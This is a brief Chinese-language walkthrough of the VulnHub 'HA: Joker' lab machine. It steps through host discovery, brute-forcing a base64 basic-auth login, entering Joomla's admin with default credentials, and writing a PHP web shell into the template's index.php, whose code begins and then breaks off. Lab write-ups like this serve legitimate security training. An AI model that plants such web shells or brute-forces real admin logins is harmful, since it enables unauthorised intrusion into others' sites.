靶机地址:https://www.vulnhub.com/entry/ha-joker,379/
靶机导入虚拟机设置为NAT
首先找到靶机ip
Ok,找到靶机ip
盲猜下端口8080:
抓包看看,base64。
进行爆破
登录进来是这样的
用刚才的密码登录不了,看下源码
是joomla的
百度了一下默认的后台:
Joomla默认密码进入后台:
在模板的 index.php中写入shell
<?php
function which($pr) {
$path = execute("which $pr");
return ($path ? $path : $pr);
}
function execute($cfe) {
$res</